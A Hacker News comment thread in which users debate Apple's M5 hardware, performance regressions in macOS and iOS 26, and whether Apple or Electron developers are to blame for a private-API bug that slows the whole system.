mumber_typhoon 20 hours ago

The M5 MacBook Pro still gets the Broadcom WiFi chip, but the M5 iPad Pros get the N1 and C1X (sweet).

All in all, Apple is doing some incredible things with hardware.

Software teams at Apple really need to get their act together. The M1 itself is so powerful that nobody really needs to upgrade it for most things most people do on their computers. Tahoe, however, makes my M1 Air feel sluggish doing the exact same tasks I've been doing for the last couple of years. I really hope this is not intentional on Apple's part to push me to upgrade. That would be a big letdown.

  • discomrobertul8 2 hours ago

    > Software teams at Apple really need to get their act together.

    watchOS 26 has rendered my Apple Watch almost useless. It's gone from lasting a whole day, including two cycling 'workouts' for my commute and the occasional lunchtime run (or gym session before work), to sitting at 40% battery by the time I make my mid-morning coffee and dying before I get home.

    I don't use most of the 'smart' features anyway - I'm mostly using the fitness features - so I'll probably switch to a Garmin at some point.

    • bean469 2 hours ago

      > I don't use most of the 'smart' features anyway - I'm mostly using the fitness features - so I'll probably switch to a Garmin at some point.

      If that's your use case, I can absolutely recommend getting one. I have a Forerunner 745 and it works great for workouts alongside some smart functions like NFC payments, quick-replies to texts, etc. The battery lasts for days as well, which you can't really beat.

      • cdaven 38 minutes ago

        > The battery lasts for days as well, which you can't really beat.

        The battery on the Garmin Instinct 2X (and 3) lasts 40 days in smartwatch mode, not counting the solar charging.

        The Instinct is an "outdoor watch" with a monochrome display, but it has most features the Forerunners have.

        • ansgri 23 minutes ago

          Also, it has a proper built-in flashlight, which is surprisingly useful. Amazing watch, especially if you get a comfortable aftermarket strap, e.g. from Hemsut.

  • kokada 20 hours ago

    > Tahoe, however, makes my M1 Air feel sluggish doing the exact same tasks I've been doing for the last couple of years.

    I have a work-provided M2 Pro with 32GB of RAM. After the Tahoe upgrade it feels like one of the sluggish PCs in the house. It is the only machine where I sometimes see the mouse teleporting when I move it fast. This is after disabling transparency in the Accessibility settings, mind you; it was even worse before.

    • runjake 16 hours ago

      It's probably due to the Electron bug[1]. A lot of common apps haven't been patched yet.

      I also have an M2 Pro with 32GB of memory. When I A/B test with Electron apps running vs. not, the lag disappears once all the unpatched Electron apps are closed.

      1. https://avarayr.github.io/shamelectron/

      Here's a script I got from somewhere that shows unpatched Electron apps on your system:

      Edit: HN nerfed the script. Found a direct link: https://gist.github.com/tkafka/e3eb63a5ec448e9be6701bfd1f1b1...
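
      For a rough sense of the same check, here's a minimal sketch (not the linked gist; it assumes apps live in /Applications, that strings(1) from the developer tools is installed, and that the bundled framework binary embeds an "Electron/x.y.z" token):

          #!/bin/sh
          # List apps that bundle Electron Framework.framework and print the
          # Electron version string embedded in the framework binary, if any.
          for fw in /Applications/*.app/Contents/Frameworks/Electron\ Framework.framework; do
            [ -d "$fw" ] || continue
            app="${fw%%/Contents/*}"
            ver=$(strings "$fw/Electron Framework" 2>/dev/null | grep -m1 -o 'Electron/[0-9.]*')
            echo "${app##*/}: ${ver:-version string not found}"
          done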

      • friendzis 3 hours ago

        > It's probably due to the Electron bug[1].

        > When I A/B test with Electron apps running vs. not, the lag disappears once all the unpatched Electron apps are closed.

        Look, if userspace apps can break system functionality to the point that the mouse cursor stops being responsive, it suggests there is something fundamentally broken in the OS.

        Yes, everyone should blame and shame Electron, but here the bug is firmly in the OS.

        • aroman 2 hours ago

          Apparently Electron was using a private API to tweak how window border shadows were rendered.[0] I leave it to you to decide how to assign blame.

          [0] https://github.com/electron/electron/pull/48376

          • friendzis 26 minutes ago

            What's a private API?

            If it is accessible from userspace, it is by no means private.

            Does it mean the API is private in the sense of an "unstable" interface? It could very well break a userspace app relying on undocumented behavior. Crucially, though, anything that is exposed to userland WILL at some point be used by some application, be it legitimate or malicious, and it should not break the OS in any way. That's basic hygiene, not even security.

            inb4: yes, a userspace app could trigger e.g. millions of IO operations and millions of number-crunching threads and thus cripple the rest of userspace (or at least the rest of userspace at a given priority level), yet the system part should still run within its performance envelope. Insert "Task Manager (Not Responding)" meme.

            • fingerlocks 8 minutes ago

              It’s not in a public header. You can snoop “private” properties and methods quite easily in Objective-C, because the concept doesn’t really exist. It doesn’t exist in C either, but if you roll up your sleeves and figure out the memory layout and offsets, you can do whatever.
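
              A low-tech way to see this from the shell (SomeApp is a hypothetical path; Objective-C selector names are stored as plain C strings in the binary, so this only shows that a reference exists, not how it's used):

                  # Does this binary mention the private _cornerMask selector?
                  strings "/Applications/SomeApp.app/Contents/MacOS/SomeApp" | grep -x _cornerMask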

          • sersi an hour ago

            If any Apple app uses a private API, then that API should be made public and documented. Having private APIs is unfair competition and bad practice.

            • friendzis 22 minutes ago

              There's no meaningful difference between "private" and "documented, but changing every patch release" from a userspace POV, yet not committing to documentation saves development effort for the same result - hence "private" APIs. If anything, private APIs let "system" apps run in userspace, reducing the attack surface dramatically.

          • biohazard2 an hour ago

            Can we blame the Apple employees who apparently never tested their new OS release with any Electron-based application?

            • rollcat 42 minutes ago

              How else do you get the message across? Do not use the private APIs.

              Electron is most likely using a whole ton more of them. Apple is sending a message: "Fix your crap or expect more."

              • biohazard2 21 minutes ago

                I can think of multiple ways to pass the message to the Electron developers:

                - Open a GitHub issue explaining that those private APIs shouldn't be used.

                - Even better, open a PR fixing their use.

                - Make those API calls a no-op if they come from an Electron app.

                - Fix those API calls so they don't grind the OS to a halt over a seemingly simple visual effect.

                - Create a tested and documented public API allowing the same visual effect.

                Choosing to (apparently violently) downgrade the user experience of all Electron app users, with no way to update by launch day, if it was a deliberate decision and not an overlooked bug, is a rather shitty and user-hostile move, don't you think?

              • freetanga 23 minutes ago

                ... and in the process we will degrade the performance of millions of users and hurt our brand as a top-class experience company?

                Don't really care who is to blame, but they should have identified this and either warned developers or warned users. Or provided a tool for identifying the guilty apps on your machine, and let users decide how to proceed.

            • fragmede an hour ago

              the reason for having a large public beta process would be to get broader testing that definitely should have found this

      • fjarlq 16 hours ago

        Helpful script, except it prints the same line regardless of the version found.

      • tomalbrc 6 hours ago

        Should we not be shaming Apple for their recent software releases? Every bit of the OS is N times slower than in the previous macOS version. Safari has been unusable - constant lags and crashes in the shipped browser alone. We are back in Windows Vista times.

      • Eric_WVGG 16 hours ago

        Unpatched apps include Asana, Bitwarden, Dropbox… some pretty high-profile names.

        • runjake 14 hours ago

          Yes, and 1Password up until today!

    • speedgoose 19 hours ago

      Do you have a few Electron-powered apps that haven't been updated yet?

      Electron used to override a private function, which makes macOS sluggish on Tahoe, and apparently no one at Apple uses Electron apps while testing.

      • kokada 19 hours ago

        I keep my applications pretty much up to date, but I didn't check the release notes of every Electron application I have to make sure they're updated. I still think this is a failure of macOS, since one misbehaving application shouldn't cause the whole environment to slow to a crawl.

        What I can say is that while the situation is much better than at Day 1, the whole Tahoe experience is not as fluid as Sequoia.

        Also, it doesn't really matter to me whether this was a private function or not; if this were Windows or Gnome/KDE, people would blame the developers of the desktop instead.

        • dylan604 19 hours ago

          It shouldn't be the user's responsibility to know what framework an app is built on and then go looking to upgrade it. Upstream comments blame Apple for "not testing Electron apps internally", but I don't expect Apple to regression-test every single app ever released. Apple releases betas, and software devs are expected to test their apps against them. The problem comes from app devs using a bit of private code when it is suggested not to do that for this very reason. Even if Apple did test and find the issue, it would still be the app devs who would need to fix it. Maybe the thought is that an email from Apple to the devs saying "fix your code" would be more compelling???

          • kokada 18 hours ago

            > Upstream comments blame Apple for "not testing Electron apps internally", but I don't expect Apple to regression-test every single app ever released.

            This happens in pretty much every Electron app as far as I know, and Electron apps like Spotify, VSCode or Slack are very likely to be in the Top 10, or at least the Top 100, most-used apps. And yes, I would expect Apple to test at least the most popular apps before releasing a new version of their OS.

            > Maybe the thought is that an email from Apple to the devs saying "fix your code" would be more compelling???

            Of course not. Apple controls the SDK; they could work around this in many different ways. For example, instead of changing how this function was implemented, they could introduce a new method (they're both private, so it doesn't matter) and effectively ignore the old one (they could also emit a warning for developers building their application that the method was removed). It would draw ugly borders in the affected apps, but at least it wouldn't cause this issue.

            • wvenable 16 hours ago

              "When developing Windows 95, one manager bought every program available at a local software store..."

              https://www.pcworld.com/article/2816273/how-microsofts-windo...

              • bee_rider 14 hours ago

                That was the '90s; QA was harder to do, but it was actually done sometimes.

                • freeAgent 20 minutes ago

                  QA was taken pretty seriously back then because, unlike today, they could not just issue a patch over the internet and expect their users to find, download, and install it. Much of the '90s was the pre-internet era for many people, and it was certainly before today's world of auto-updating apps, good search engines, etc.

                • pjmlp 4 hours ago

                  In the '90s we also got to enjoy native apps.

            • dylan604 18 hours ago

              > (they could also emit a warning for developers building their application that the method was removed)

              Why do we think this would be a fix, when the devs clearly ignored the previous message about not using a private method?

              • kokada 18 hours ago

                > Why do we think this would be a fix, when the devs clearly ignored the previous message about not using a private method?

                If anything, the fact that devs can even access private symbols is an issue with how Apple designed their APIs; they could make this so annoying to do that nobody would try (for example, by stripping the symbols).

                Also, the fact that devs need to reach for private symbols to do what they need shows that the public API is lacking at least some features.

                Another thing: if this only affected the app itself, that would be fine, but it makes the whole system slow to a crawl.

                So while devs share some of the blame here (and I am not saying they don't), I still think this whole situation is mostly Apple's fault.

                • tedivm 17 hours ago

                  If you actually read the specific bug and the use of the private method, it really was a stupid decision by one developer a while ago that just fell through the cracks. There really wasn't a benefit to doing what they did, which is why their fix was to just go back to using public APIs.

                  I think the failures here are that Apple should have tested this themselves and the Electron devs should have tested and resolved this during the beta period.

                  • magicalist 15 hours ago

                    > If you actually read the specific bug and the use of the private method, it really was a stupid decision by one developer a while ago that just fell through the cracks. There really wasn't a benefit to doing what they did, which is why their fix was to just go back to using public APIs.

                    I don't think it's that clear cut. It looks like it was a workaround for a macOS rendering bug going back to at least 2017; it landed in 2019 and had no apparent downsides for six years[1].

                    The PR removing the private API code also included someone verifying that Apple had fixed the original bug some time in the intervening years[2].

                    I probably wouldn't have taken this approach personally (at the very least, file the original rendering issue with Apple and note it in the code, though everyone knows the likelihood of getting even a response on an issue like that), but it wasn't some cargo-culted fix.

                    [1] https://github.com/electron/electron/pull/20360

                    [2] https://github.com/electron/electron/pull/48376#issuecomment...

                  • conductr 13 hours ago

                    Who’s to say Apple didn’t test it and push it out anyway to force the Electron devs’ hand? It’s their garden and they can move the walls.

                    • kokada 13 hours ago

                      This only made Apple look bad. Again, this is not a bug that makes the app slow; it makes the whole system slow.

                      Imagine now that you're a non-tech-savvy user who probably doesn't update apps very often; you're left wondering why "my laptop is so slow after updating". But like I said in another thread, maybe this is on purpose, to make people upgrade.

            • 0x457 15 hours ago

              Spotify doesn't use Electron, though. Also, I do not expect Apple to care about Electron, because delivering a shitty Electron experience only benefits their native apps.

              • kokada 14 hours ago

                If anything, the one whose reputation got worse here is Apple itself. The bug basically slows the whole system, not just the application with the bad behavior.

                Sure, people on Hacker News now know that the issue is "that Electron bug", but I am sure lots of less tech-savvy people just kept wondering what the hell was happening and maybe even considered an upgrade. But maybe that is the whole point.

                • NetMageSCW 13 hours ago

                  Seems like the right patch is to just crash any app attempting to use the private API, so the blame would go where it is deserved. And if it raised more awareness of the need to get rid of Electron, bonus.

          • sersi an hour ago

            > blame Apple for "not testing Electron apps internally", but I don't expect Apple to regression-test every single app ever released.

            Given how high-profile the impacted apps are, yes, it's their responsibility to test them. Even Microsoft does better there (or at least used to). Contacting Electron and finding a solution would have been an easy step to take.

          • danudey 12 hours ago

            It seems as though a lot of arguments about this boil down to a few inane implications:

            1. Apple should test every (common?) app, and any change to the OS that makes an app worse shouldn't be made, regardless of why they wanted to make that change.

            2. Even though Apple tells people not to use private APIs, if a program uses a private API anyway, Apple should build a workaround into their OS instead of letting apps suffer their own repercussions.

            3. Apple should test everything ahead of time and then go around telling all the app developers that there's a problem, as if those app developers are going to do anything about it.

            No matter what Apple did here, their actual choices boiled down to:

            1. Add workarounds for misbehaving broken apps, giving those apps no incentive to fix their issues, and forcing Apple to support those workarounds indefinitely; this also undermines their "don't use private APIs, they could break later" position. This is the kind of thing that made Windows into an unmaintainable sack of cruft.

            2. Do what they did, which is change the API and let broken apps be broken to the user's detriment. Everyone blames Apple even though it's objectively not their fault.

            3. Add some kind of non-workaround that causes problems for the app and not the user; e.g. have this private API rate-limited or something so that the app ends up blocking in the call. Could cause problems for actual consumers of this API, and people would still blame Apple, but in this case it would be more their fault than option 2.

            In the end, Apple can't spend their time fretting over what bad developers do wrong; they spend their time on their OS and software and if a developer writes bad software and causes problems then so be it.

            • mcculley 36 minutes ago

              Apple really should investigate why so many popular apps are implemented using Electron. Is it that hard to use the native APIs now? If so, Apple needs to improve the native application development experience. The UX on these apps is terrible and should be embarrassing for all involved.

            • sunshowers 5 hours ago

              I think testing the top 10 projects in a few verticals is a pretty reasonable thing. For my open source projects I do this kind of basic QA against their top users.

              Then the bugs could be reported to the various app developers, and they would have been able to get some notice. Many would have acted on it. Many of the top apps have dedicated Apple contacts already. Seems like a completely reasonable expectation?

        • speedgoose 19 hours ago

          Yes I think Apple is to blame there. Electron is so prominent that they should have detected the problem and found a solution well before the general release.

          • danudey 12 hours ago

            Apple releases betas of their OS specifically so that developers can try their apps on them. macOS is so prominent that Electron-using developers should have detected the problem and found a solution well before the general release.

            • rock_artist 4 hours ago

              Well, I personally know of cases where Apple did explicit patching for specific apps to keep them working / avoid breaking them.

              My simple guess is that this slipped QA or wasn’t escalated from Apple’s feedback process.

              Considering the number of Electron apps, expecting all developers and all users to update all their apps (and to guess which ones are Electron-based) isn’t good user experience.

              Let’s say the change is needed in the OS; you’d still expect a transition period. Also, good OS UX would be to notify the user that an app is using some API in a way that could degrade the experience. Putting the expectations only on the developer and user parties, without the OS side doing anything, makes less sense imho.

            • ryukoposting 4 hours ago

              I don't do desktop applications professionally (firmware is my thing) but I would balk at the suggestion that I should run a beta OS on the machine that pays my rent.

              What portion of, say, Slack devs actually run a macOS beta at work? Are they regular devs, or are they in QA/test? It seems to me like the latter is the far more appropriate team for this.

            • bambax 3 hours ago

              If the result of this policy is that users think Apple products are crap, then it's probably counter-productive for Apple, no?

          • wrs 14 hours ago

            Apple just doesn’t work that way, and hasn’t since I worked there in the 90s. Private APIs are out of bounds. It’s like a “the FBI doesn’t negotiate with kidnappers” situation.

            • makeitdouble 11 hours ago

              > "the FBI doesn’t negotiate with kidnappers”

              Welp

              https://leb.fbi.gov/articles/featured-articles/fifty-years-o...

              Apple's private API situation was also much more nuanced back in the day: if Adobe was using an API, private or not, it probably wouldn't be degraded in any way until the core applications moved forward. Current Apple might not give a damn, though.

              • wrs 7 hours ago

                Yeah true, there was a period when they couldn’t really afford to annoy the big developers. But it doesn’t seem like the underlying attitude changed much!

          • IMTDb 17 hours ago

            So now you can disregard the notion of a "private function" if you pass 100k stars on GitHub?

            • javawizard 16 hours ago

              There's definitely a line of thinking that would say "yes": https://www.hyrumslaw.com/

              • 0x457 15 hours ago

                Sure, someone will depend on it; we've all ignored "private" vs "public" at least once. Is it okay to do that and then be mad when your thing breaks because you decided to depend on it? Nope.

                • Dylan16807 14 hours ago

                  Okay to be mad the OS vendor didn't do anything to help when the users are the ones that face the fallout? Yes.

                  Even if you disqualify the devs from being mad, everyone else gets to be mad.

                  • 0x457 13 hours ago

                    The vendor did help... they marked the function as private. I view this specific incident as another argument against Electron, so I'm biased.

                    • Dylan16807 13 hours ago

                      That's a good initial step. But once it got put on a zillion computers, there should have been additional mitigation steps.

                      In an ideal situation, they would have noticed the widespread use of this private function a long time ago, put a note on the bug report that it works around, and after they fixed the bug they would have reached out to Electron to have them remove that access.

                      • javawizard 12 hours ago

                        Exactly. As they say: if you owe the bank $100, that's your problem; if you owe the bank $100 million, that's the bank's problem.

            • ruined 16 hours ago

              all APIs are public APIs

              • NetMageSCW 13 hours ago

                Only if you don’t care about your users or your app’s reputation. Of course, if you are using Electron, those ships have already sailed.

      • placatedmayhem 19 hours ago

        The check script I've been recommending is here:

        https://github.com/tkafka/detect-electron-apps-on-mac

        About half of the apps I use regularly have been fixed. Some might never be fixed, though...

        • EasyMark 19 hours ago

          Wasn't there a workaround for those apps that might not ever get updated? I thought I saw something on Reddit - some config change.

      • EasyMark 19 hours ago

        This is why I stay on the previous release until at least 0.2 or 0.3, to let them work out the bugs so I don't have to deal with them. There was nothing in 26 that felt pressing enough that I would need to update.

        • abustamam 17 hours ago

          Tbh I'm purposely not updating because I'm not in love with the new ~Aero~ glass UI.

      • pjmlp 4 hours ago

        The WWDC Platforms State of the Union keynote was quite clear on what Apple thinks about Electron and related stuff like React Native.

        Hence I am not surprised that they ignore their existence.

      • michelb 17 hours ago

        The OS and stock apps are much slower in Tahoe, even. And the UI updates/interactions are also slower. I’m lucky I only upgraded my least-used machine, and that’s a well-stocked M2.

        • astrange 16 hours ago

          It should not be slower. File a report in Feedback Assistant.

      • nikanj 16 hours ago

        Or more likely nobody gives a damn about performance while doing testing.

    • kobalsky 19 hours ago

      my tinfoil-hat theory is that on each OS iteration, Apple adds new features that leverage the latest chips' hardware-acceleration capabilities, and for older chips they fall back to software-only implementations.

      they Ship-of-Theseus the crap out of their OS, replacing parts with ones that need these new hardware features and run slow on older chips due to the software-only fallbacks.

      I got the first-generation iPad Pro, which is e-waste now, but I use it as a screen for my CCTV. It cannot even display the virtual keyboard without stuttering like crazy, it lags switching apps, and there's a delay for everything. This thing was smooth as butter on release.

      • thewebguyd 19 hours ago

        I have the 4th gen (2020) iPad Pro with the A12Z Bionic, the same chip they put in the Apple Silicon transition dev kits. With iPadOS 26 it's become barely usable, despite being as performant as ever on iPadOS 18. I'm talking a huge drop in performance, with stutters and slowdowns everywhere.

        I was considering just replacing the battery and keeping it for several more years, but now I feel forced to upgrade, which has me reconsidering whether I still want/need an iPad: I'd also have to buy a new Magic Keyboard since they redesigned it, and they bumped the price ($1299 now vs. $999 when I got the 4th gen), so I'd be looking at $1700. I'm trying to hold out for an iPad Air with ProMotion.

        I may be in the minority here, but I think 5 years is too short a lifespan for these devices at this point. In the early days, when things were advancing like crazy, sure. But now? I have 8-year-old computers that are still just fine, and with the M-series chips I'd expect at least 10 years of usable life at minimum (battery notwithstanding).

        • qingcharles 19 hours ago

          That's weird. I have an 8th Gen iPad, the slowest device that can run iPadOS 26, and everything is fine on that old thing. (except the OS takes up the majority of the storage)

          • techstrategist 15 minutes ago

            weird, my iPad Air 3, which should have the same specs, has been really slow for at least a year. Plenty of free storage, not that many apps, all visual enhancements turned off.

          • thewebguyd 18 hours ago

            Interesting. Might try a factory reset then and see. There's noticeable lag for me; it's especially slow when switching apps or bringing up the keyboard, as well as on first unlock. Interacting within a single app is still fine; it's interacting with the OS that's really sluggish.

            • NetMageSCW 13 hours ago

              How long have you been running on 26? Every iOS/iPadOS update takes a few days to stabilize.

            • gosub100 16 hours ago

              Total guess but is there a tiny fan inside that got filled with dust? Maybe it's thermal throttling.

              • sgerenser 15 hours ago

                Apple has never made an iPad with a fan

          • dwood_dev 16 hours ago

            The 8th Gen iPad is about the same on iPadOS 26 as on 18 for me, which is slow. The 32GB really handicapped it to the point of barely being usable; to even upgrade it, I have to factory reset it first. I'm replacing it with a Mini.

            The iPad Air 13 with an M3 is a really nice experience. Very fast device.

        • cgh 7 hours ago

          I have a 3rd Gen iPad Pro from 2018 and iPadOS 26 runs fine.

      • trinix912 15 hours ago

        Plus, they don't let you downgrade to previous iOS versions on iPhones and iPads (unless you've been smart enough to save SHSH blobs and all that), so the only option to revert to a smooth version now is to download a sketchy jailbreak.

        • 05 3 hours ago

          > A12 devices and newer

          > You cannot restore to any iOS versions other than signed ones. All SHSH blobs are currently useless.

          So, anything newer than an iPhone X can’t be downgraded

      • osn9363739 11 hours ago

        At some point you have to use the new features available to you. That's not really tinfoil, just progress - it's how all tech works, no?

        • setopt 11 hours ago

          They could choose to not offer the new feature to users on old hardware, but still provide those platforms with e.g. security updates and key features like Safari upgrades.

        • behnamoh 7 hours ago

          This couldn't be farther from the truth. People still use vim, and it's better than most new tech made after the 2000s.

    • prettyblocks 16 hours ago

      I'm on an M2 with 24GB of RAM and it feels like it flies as fast as ever.

    • ExoticPearTree 19 hours ago

      26.0.1 fixed the sluggishness. 26.0 was pretty unstable - felt like a game dropping frames.

      • kokada 19 hours ago

        26.0.1 is better, but I can still get sluggishness in a few specific cases.

        I just hit one example while moving the mouse quickly across my Dock (I still use the magnify animation), and I could clearly see it dropping a few frames. This never happened in macOS 15.

    • Angostura 16 hours ago

      I don't get this - I have an M1 iMac - haven't noticed much difference.

    • jen20 8 hours ago

      > work-provided

      I too have a work-provided laptop and a personal one bought the same month, with identical specs (the only difference is the US vs UK keyboard layout). The work-provided one is at least an order of magnitude slower to do anything thanks to enterprise crapware.

    • tsunamifury 17 hours ago

      Disabling transparency adds another draw layer that is opaque on top, making it even worse than when it's on.

      • array_key_first 13 hours ago

        If they developed it in the most naive and stupid way imaginable, sure. If we're assuming Apple isn't filled with 3rd year comp sci students, then no.

        • tsunamifury 10 hours ago

          HAHA, this is where HN has become delusional. It quite literally is the implementation; people have checked the render pipeline on Reddit. Jesus, the arrogance here is so shit.

  • xz0r an hour ago

    I've seen every new OS update degrade my M1 Air's performance; at this point I'm pretty convinced Apple is doing this intentionally.

    Edit: Same experience with iPhone X

    Edit2: I still remember the feeling when I got them initially - that Apple is on the customer's side - but now I feel totally helpless, like I'm being forced to upgrade.

    • noname120 an hour ago

      I haven’t noticed this, to be honest: macOS 26 Tahoe is the first update that significantly hindered the performance of my MacBook Air M1. Even with the Electron _cornerMask fix + disabling auto heuristics at the OS level.

  • SkyPuncher 18 hours ago

    There are so many software related things that drive me absolutely loony with Apple right now.

    * My iPhone as a remote for my Apple TV has randomly decided it can no longer control the volume - despite the "Now Playing" UI offering an audio control that works.

    Their auth screens drive me crazy:

    * Why can I not punch in a password while Face ID is working? If I'm skiing, I know Face ID isn't going to work; stop making me wait.

    * Likewise, on Apple TV the parental control input requires me to explicitly choose to enter a Pin Code. Why? Just show me the Pin Code screen. If I can approve from my device, I will.

      * Similarly, if I use my phone as a remote, why do I need to manually click out of the remote to get to the parental control approval screen? I'm literally using my phone. Just auto-approve.

    • strbean 17 hours ago

      > * Why can I not punch in a password while Face ID is working? If I'm skiing, I know Face ID isn't going to work; stop making me wait.

      Funny, a similar thing has been driving me crazy on my Ubuntu 20.04 laptop with fingerprint login. When unlocking, I can either enter a password or use the fingerprint reader. On boot, I am not allowed to enter a password until I fail with the fingerprint. If I use the fingerprint to log in on boot, I have to enter my password anyway once logged in, to unlock my keychain.

      I should probably just figure out a way to disable fingerprint on boot and only use it for the lock screen.
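
      For what it's worth, on stock Ubuntu the fingerprint step is wired in through pam-auth-update profiles, so a sketch like the following might work (service names vary by desktop, so verify which PAM service your locker actually uses, and back up /etc/pam.d first):

          # Untick "Fingerprint authentication" in the interactive menu to
          # remove pam_fprintd.so from the shared /etc/pam.d/common-auth stack:
          sudo pam-auth-update

          # Then re-enable it only for the PAM service your screen locker uses,
          # by adding a line like this near the top of that service's file:
          #   auth  sufficient  pam_fprintd.so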

    • sample2 16 hours ago

      I see the same bug with the remote on my phone. How did they manage to break volume control in the app while keeping it working from the lock screen’s “Now Playing”?

      I’ve also been unable to get the remote app on my watch to work at all. It’s hard to imagine people working at Apple don’t also run into these issues all the time.

    • sotix 17 hours ago

      Why can I not use my password manager for my Apple ID, when I can use it for any other password field? Instead I have to switch to my password manager, copy the password, reopen the App Store, select get app, and paste the password into the Apple ID login pop-up in the 10 seconds before my password clears from my clipboard.

      • mschuster91 16 hours ago

        Been ages, but I think you can mitigate that annoyance by enabling Touch ID for purchases.

        • sotix 12 hours ago

          It requires a password to enable Touch ID whenever you restart your phone. For security reasons, the iPhone automatically restarts every few days. So I run into this issue regularly.

    • okrad 6 hours ago

      The volume on the iPhone, when it's being used as a remote, seems to work if you use the hardware buttons. It's not intuitive at all, but it works.

    • gxs 17 hours ago

      As someone who jumped on the Apple bandwagon at peak Apple and hasn’t been through all their ups and downs the way some die-hards have, it’s been super aggravating dealing with Apple’s shit lately - not what I signed up for all those years ago.

      It seems to have been degrading for a long time, but for me it’s this past year when it crossed into that threshold Android used to live in, where using the phone causes a physiological response from how aggravating it can be sometimes.

      I let my guard down and got too deep into the Apple ecosystem - I know better and always avoided getting myself into these situations in the past, but here I am.

      The phone sucks right now - super buggy, and they continue to remove/impose features that should be left as an option to the user. Yes, this has always been the knock on Apple, but I typically haven’t had an issue with their decisions - it’s just so bad now.

      Lesson (re)learned and I will stay away from ecosystems - luckily the damage here is only for media.

      The minute I can get blue bubbles reliably on an Android, I’ll give the Pixel a shot again - if that sucks too, then maybe I’ll go back to my teenage years and start rooting devices again.

      • SkyPuncher 16 hours ago

        So, I still think the experience is generally better and more integrated than when I was on an Android device. I just find they're generally not really paying attention to user details the way they have in the past.

      • skinnymuch 16 hours ago

        How would you ever get blue bubbles reliably on Android? Are you talking about iMessage or something else?

        I am fully bought into the Apple ecosystem. Not sure yet if I regret it. It is annoying to be so tied down to one company that isn’t going the way I want it to.

        • gxs 14 hours ago

          Yeah, iMessage - over the years there have been “breakthroughs” - people find nifty workarounds or have even reverse-engineered the iMessage protocol, but for whatever reason nothing ever sticks.

          There are current workarounds, like using your home Mac as a relay, but nothing super elegant that I know of.

    • sgt 17 hours ago

      I highly recommend the Apple remote .. then you also don't need to take your phone with you when you are watching TV, which is an added benefit for some.

      Of course, the thin Apple remote has a way of getting lost, but it has a Find My feature which locates it pretty well.

      • SkyPuncher 16 hours ago

        Remote is fine, but it's always stuck in a couch cushion.

        • K7PJP 15 hours ago

          There was a company or two that made cases for the older Apple remotes with the express purpose of making them larger, which I always thought was kind of funny. I would buy one for the current remote if one existed.

        • sgt 16 hours ago

          Same here... we use that find-remote functionality about once a month! Without it we'd be lost. Business idea: make a cover for the Apple remote that makes it bigger and harder to lose.

  • port11 15 hours ago

    It's incredible what the hardware teams at Apple have been doing. I imagine they also feel let down by the software that's driving these beasts. It's as if they're 2 completely different companies.

    • kenjackson 15 hours ago

      The latest iPhone OS (iOS 26) is embarrassing. The number of glitches and amount of UI sloppiness is crazy for a company that historically prided itself on the details. It's the first major iOS update I've taken that just seems almost strictly worse than its predecessor.

      • paweladamczuk 14 hours ago

        I remember using my first Apple product years ago, it was an iPod touch 4th gen. The quality of the software on that thing was in a completely different league compared to anything I had used before.

        I also installed the iOS 26 update recently. The competitive advantage of software polish that Apple had seems totally gone.

        Add to that bugs in iCloud, AirDrop... I don't think I will be buying any more Apple devices for myself.

        • 0xWTF 6 hours ago

          What line of laptops is in the same league as the MacBook Pro?

      • kossTKR 14 hours ago

        A small silver lining: if the world's largest company can ship complete garbage like this, don't feel bad about your own small mistakes. I mean, I've hotfixed and done my fair share of production reverts - but never, never anything as bad as this.

        Disclaimer: I actually like a bit of "bling", but both Tahoe and iOS are so filled with glitches and errors, and the UX is so bizarrely inconsistent, that it really is catastrophically bad.

      • georgel 14 hours ago

        This feels more like a repeat of iOS 7 to me.

        • Andrew_nenakhov 5 hours ago

          iOS 7 was the first version of iOS that looked good. Its release was far better and more stable than this Liquid Glass thing.

      • whimsicalism 11 hours ago

        i've never had such a major downgrade as this one

    • fragmede 44 minutes ago

      In the case of Microsoft and Intel, they were. Vertical integration is Apple's claim to fame, but apparently it has its limits.

  • artk42 38 minutes ago

    > I really hope this is not intentional on Apple's part to push me to upgrade. That would be a big letdown.

    I've got a reference MacBook Air from 2015 which is almost clean; only Zoom, Teams and Chrome (for Meet) are installed, used for calls. And boy, do I regret installing macOS updates... I can believe Teams and Zoom are shitbags of modern software slop and thus started to fail at running simple video calls. But even native macOS apps that have barely been updated in years, like Notes and Calendar, are freezing now. So I can only conclude that these anti-backward-compatibility updates are highly intentional, because the hardware is absolutely fine for a decade. I even used this ultra-tiny Air for travel work back in 2022; it was still capable of all the office things and thin-client work. But last year it just turned into a pumpkin.

    My question is: would installing Linux help bring it back to life?

  • nofunsir 5 hours ago

    Before the whole "batterygate" thing[1], there were forums and discussions on MacRumors and similar sites inquiring about the feasibility of inserting no-op code deep below the kernel that would kick in under certain conditions. Post-batterygate, you can't find anything NOT about batterygate when searching.

    [1] Which I still firmly believe WAS indeed a power-supply design failure that would have forced a massive hardware recall had they not done something (slowing down the OS). I believe it encompassed everything from inaccurate CPU power estimates to something actually incorrect with the PCB design, causing brownouts - and not merely the battery-aging red herring that is the reported scandalous reason they were "caught". In fact, I think Apple is GLAD that all it amounted to was some philosophical hullabaloo about protecting your poor aging battery.

    To clarify, I suspect the "aging battery" merely exposed the real issue - the incorrect power-supply design - which Apple successfully covered up.

  • greg5green 16 hours ago

    > The M5 MacBook Pro still gets the Broadcom WiFi chip, but the M5 iPad Pros get the N1 and C1X (sweet).

    Is that good? Their cellular modems have been terrible. I'll reserve judgement until trying one out.

    > The M1 itself is so powerful

    I think this is a bit of a fallacy. Apple Silicon is great for its performance-to-power ratio, but something like a Ryzen 9 7945HX can do 3x more work than an M1 Max. And a non-laptop chip, like an Intel Core Ultra 7 265K, can do 3.5x.

  • eboynyc32 5 hours ago

    I think Tahoe is great on my M1 Studio. It’s the first OS update in a long time that I actually like. The new design feels very futuristic. And I think I’ll get an M5 MacBook Air. There’s no better computer deal. Even my 5-year-old M1 still never has any issue with video or rendering. It’s insane.

  • RataNova an hour ago

    And it kind of defeats the purpose of having such powerful hardware if the OS isn't keeping up (or worse, actively throttling older devices)

  • mcculley an hour ago

    Does this mean that the MacBook Pro still has no option for a cellular modem?

  • kwanbix 16 hours ago

    I really wish Apple sold the Mx chips to others, like Lenovo.

    I would love to see a ThinkPad with an M5 running Linux.

    • tomekf 2 hours ago

      There are very nice ThinkPads running on Snapdragon now. But no Linux is available…

    • fph 16 hours ago

      What is the Linux experience on new Mac hardware? I'd be interested also in running a Macbuntu.

      • bmdhacks 16 hours ago

        Asahi Linux is essentially in a holding pattern, with support only up to the M2. Likely Linux will never be supported above the M2, and even the M2 has a lot of rough edges. When my monitor sleeps on M2 Linux, it can never reawaken without a reboot.

  • ksec 20 hours ago

